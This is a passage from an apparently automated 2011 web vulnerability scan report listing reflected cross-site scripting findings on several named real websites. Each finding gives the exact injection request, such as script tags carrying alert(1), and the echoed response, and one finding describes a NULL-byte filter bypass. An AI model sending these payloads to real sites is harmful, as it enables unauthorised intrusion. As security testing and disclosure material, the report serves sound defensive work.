Host:	http://coverage.mqcdn.com
Path:	/coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8261<script>alert(1)</script>64e42659620 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1100

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqaco
...[SNIP]...
yrights": [{"text": "i-cubed", "html": null, "group": "Imagery", "id": "i3"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1")

5.74. http://d.tradex.openx.com/afr.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64156</script><script>alert(1)</script>5e557625608 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0318609e4899f4eef14c1bdd55dccb7d; expires=Fri, 04-May-2012 00:59:53 GMT; path=/
Content-Length: 3654
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608&loc=")', 65000);
// ]]>
...[SNIP]...

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19a0</script><script>alert(1)</script>1f2595708be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=41ceb160f94c774738d19cd8e91c39ef; expires=Fri, 04-May-2012 01:00:00 GMT; path=/
Content-Length: 3660
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1&loc=")', 65000);
// ]]>
...[SNIP]...

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767dd</script><script>alert(1)</script>21a4c215031 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f74278266cdb1b8473acb25c7b316621; expires=Fri, 04-May-2012 00:59:42 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 65000);
// ]]>
...[SNIP]...

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.aol.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dac"-alert(1)-"5c1e0974f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?44dac"-alert(1)-"5c1e0974f61=1 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304610976566-Repeat%7C1367682976566%3B%20s_nrgvo%3DRepeat%7C1367682976568%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:10:48 GMT
Server: Apache
Set-Cookie: RSP_DAEMON=db7023215051147ee79a8596304debb9; path=/; HttpOnly
Set-Cookie: RSP_DAEMON=a41cc5d6c93fa2f59be7062a842ab853; path=/; HttpOnly
Set-Cookie: SESSad0659a5e17377ebcd7da6b8d8fff621=ba17ae41e03a9b08a1801ca15dd2dc35; path=/; domain=.dev.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cteonnt-Length: 16122
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
op1=s_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/?44dac"-alert(1)-"5c1e0974f61=1"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.aol.com
Path:	/themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0aa8"-alert(1)-"51d1db99da0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:55 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.aol.com
Path:	/themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 382d8"-alert(1)-"22026a1b8d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:57 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.aol.com
Path:	/themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e49c1"-alert(1)-"ff73b5a19e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:59 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
" : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.aol.com
Path:	/themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67568"-alert(1)-"863d34e5ea4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:11:01 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:11:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
aolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.82. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b2815"><script>alert(1)</script>03c666340fe was submitted in the REST URL parameter 1. This input was echoed as b2815"><script>alert(1)</script>03c666340fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%00b2815"><script>alert(1)</script>03c666340fe HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Fri, 06-May-2011 10:53:04 GMT; path=/; domain=digg.com
Set-Cookie: d=d50133d15ecf2dcd7ba69de08580494f90965e3d73b97e5fa32ac2711cba5273; expires=Tue, 04-May-2021 21:00:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=600466 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%00b2815"><script>alert(1)</script>03c666340fe.rss">
...[SNIP]...

5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/free

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbae5"%3b7b2f70e4cdd was submitted in the REST URL parameter 1. This input was echoed as bbae5";7b2f70e4cdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseballbbae5"%3b7b2f70e4cdd/free HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseballbbae5";7b2f70e4cdd:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseballbbae5";7b2f70e4cdd:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/free

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bb6"%3bc5e8272f943 was submitted in the REST URL parameter 2. This input was echoed as 93bb6";c5e8272f943 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseball/free93bb6"%3bc5e8272f943 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13083

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:free93bb6";c5e8272f943:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:free93bb6";c5e8272f943:error";
s_265.prop12=document.URL.split('?')[0];
...[SNIP]...

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/promo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8bc"%3b5944e8d17f4 was submitted in the REST URL parameter 1. This input was echoed as 3b8bc";5944e8d17f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseball3b8bc"%3b5944e8d17f4/promo HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball3b8bc";5944e8d17f4:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseball3b8bc";5944e8d17f4:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/promo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ed8"%3b39d6845c6c7 was submitted in the REST URL parameter 2. This input was echoed as 14ed8";39d6845c6c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseball/promo14ed8"%3b39d6845c6c7 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
